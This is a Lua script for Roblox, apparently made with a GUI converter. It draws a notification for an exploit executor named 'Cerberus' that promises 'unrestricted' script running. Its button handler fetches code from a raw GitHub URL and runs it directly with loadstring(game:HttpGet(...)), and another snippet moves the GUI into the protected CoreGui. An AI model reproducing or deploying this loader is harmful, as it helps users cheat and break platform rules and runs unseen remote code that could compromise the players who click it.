-- Gui to Lua
-- Version: 3.2

-- Instances:

local Attach = Instance.new("ScreenGui")
local Notifiction = Instance.new("Frame")
local Notifiction_2 = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local ImageButton = Instance.new("ImageButton")

--Properties:

Attach.Name = "Attach"
Attach.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
Attach.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Notifiction.Name = "Notifiction"
Notifiction.Parent = Attach
Notifiction.BackgroundColor3 = Color3.fromRGB(21, 21, 21)
Notifiction.BackgroundTransparency = 1.000
Notifiction.Position = UDim2.new(0, 0, 0.836333871, 0)
Notifiction.Size = UDim2.new(0, 337, 0, 100)

Notifiction_2.Name = "Notifiction"
Notifiction_2.Parent = Notifiction
Notifiction_2.BackgroundColor3 = Color3.fromRGB(21, 21, 21)
Notifiction_2.Position = UDim2.new(0.311572701, 0, 0.221538082, 0)
Notifiction_2.Size = UDim2.new(0, 264, 0, 67)

TextLabel.Parent = Notifiction_2
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.508019269, 0, 0.022038579, 0)
TextLabel.Size = UDim2.new(0, 84, 0, 23)
TextLabel.Font = Enum.Font.GothamSemibold
TextLabel.Text = "SS"
TextLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = Notifiction_2
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.123095363, 0, 0.00942090433, 0)
TextLabel_2.Size = UDim2.new(0, 161, 0, 23)
TextLabel_2.Font = Enum.Font.GothamSemibold
TextLabel_2.Text = "Cerberus"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

TextLabel_3.Parent = Notifiction_2
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0, 0, 0.365321815, 0)
TextLabel_3.Size = UDim2.new(0, 263, 0, 42)
TextLabel_3.Font = Enum.Font.GothamSemibold
TextLabel_3.Text = "Cerberus is attached! Run any script without any problem, unrestriced! We thank you for using our program! Made by Polaris#2680, feel free to add me if there is anything wrong with the script, or if you have any questions!"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

ImageButton.Parent = Notifiction
ImageButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageButton.BackgroundTransparency = 1.000
ImageButton.Position = UDim2.new(0.0270000007, 0, 0.222000003, 0)
ImageButton.Size = UDim2.new(0, 85, 0, 69)
ImageButton.Image = "http://www.roblox.com/asset/?id=659591449"
ImageButton.ImageColor3 = Color3.fromRGB(197, 0, 0)

-- Scripts:

local function KXCIVR_fake_script() -- ImageButton.LocalScript 
	local script = Instance.new('LocalScript', ImageButton)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/Ne0n2680/x/main/cerberussRED'))()
	end)
end
coroutine.wrap(KXCIVR_fake_script)()
local function NOZXAK_fake_script() -- Attach.LocalScript 
	local script = Instance.new('LocalScript', Attach)

	Attach.Parent = game.CoreGui
end
coroutine.wrap(NOZXAK_fake_script)()
